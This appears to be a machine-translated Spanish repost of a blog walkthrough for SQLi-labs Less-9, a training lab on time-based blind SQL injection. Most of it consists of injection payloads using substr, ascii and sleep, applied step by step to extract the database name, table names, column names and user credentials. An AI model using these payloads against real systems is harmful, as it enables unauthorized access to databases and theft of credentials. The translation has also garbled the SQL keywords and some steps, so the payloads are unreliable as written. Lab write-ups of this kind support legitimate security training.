SQLi-labs Menos-9

Others 2020-03-28 12:40:49 views: null

Menos-9 Get - Ciegos -Tiempo basados ​​Cotizaciones -Single

La página original
Aquí Insertar imagen Descripción
basado en el tiempo de las persianas
directamente de vuelta si es correcto, el momento equivocado que esperar 5 segundos.

1. Base de datos conjetura:
?. = ID 1 'y el Si (. ASCII (substr (base de datos (), 1,1)) = 115,1, SLEEP (5)) - +
Aquí Insertar imagen Descripción
?. = ID 1' y el Si (ASCII (substr ( base de datos (), 1,1)) = 114,1, sueño (5)) - + Aquí Insertar imagen Descripción
describió por primera vez es S (código ASCII 115)

? Id = 1'and Si (ascii ( substr (base de datos (), 2,1)) = 101,1, dormir (5)) - + Aquí Insertar imagen Descripción
Descripción segundo es e (código ASCII es 101)
... y así sucesivamente, obtener el nombre de la base de datos de seguridad

2. especulación tabla de base de datos de seguridad de los datos:
? Lo anterior Identificación del mencionado = 1'and el Si (ASCII (substr ((INFORMATION_SCHEMA.TABLES WHERE de la esquema_tabla nombre_tabla SELECT = 'seguridad' límite de 0, 1), 1, 1)) = 101, 1, sueño (5)) - +Aquí Insertar imagen Descripción

? Id = 1'and Si (ascii ( substr ((select nombre_tabla de INFORMATION_SCHEMA.TABLES donde esquema_tabla = 'seguridad' límite de 0,1), 1,1)) = 100,1, dormir (5)) - + Aquí Insertar imagen DescripciónDescripción de la primera tabla de datos es un correo, ... y así sucesivamente, para obtener mensajes de correo electrónico

? ID = 1'and el Si (ASCII (substr ((SELECT FROM nombre_tabla DONDE INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = 'Seguridad' límite de 1,1), 1,1)) = 114,1, SLEEP (5).) - +
(Analizar pasos anteriores)
después de varios intentos de conseguir todas las fichas de datos de correos electrónicos, mensajes referenciadores, uagents, usuarios

3. columna de adivinar los usuarios de la tabla:
? El anteriormente mencionado de id = 1'and el Si (ASCII (substr ((INFORMATION_SCHEMA.COLUMNS WHERE de la nombre_tabla SELECT nombre_columna = límite de 'usuarios' 0, 1), 1, 1)) = 105,1, SLEEP (5)) - +
(etapa de determinación supra)
de varios intentos, el nombre de la columna es el ID, nombre de usuario, contraseña

4. El valor de la conjetura nombre de usuario:
? ID = 1'and el Si (. ASCII (substr ((SELECT nombre de usuario de los usuarios limitan 0,1), 1,1)) = - 68 y, SLEEP (5)) - +
(operación de decisión ibid.)
varios intentos para obtener todos los nombres de usuario y contraseñas

por todas partes
Publicado 15 artículos originales · ganado elogios 2 · Vistas 295
carta privada preocupaciones

Supongo que te gusta

Origin blog.csdn.net/qq_42630215/article/details/105069346
Recomendado
Clasificación
Diario
Más
2024-05-14(10)
2024-05-13(7)
2024-05-12(22)
2024-05-11(31)
2024-05-10(32)
2024-05-09(31)
2024-05-08(18)
2024-05-07(35)
2024-05-06(4)
2024-05-05(0)

Code World

© 2018 codetd.com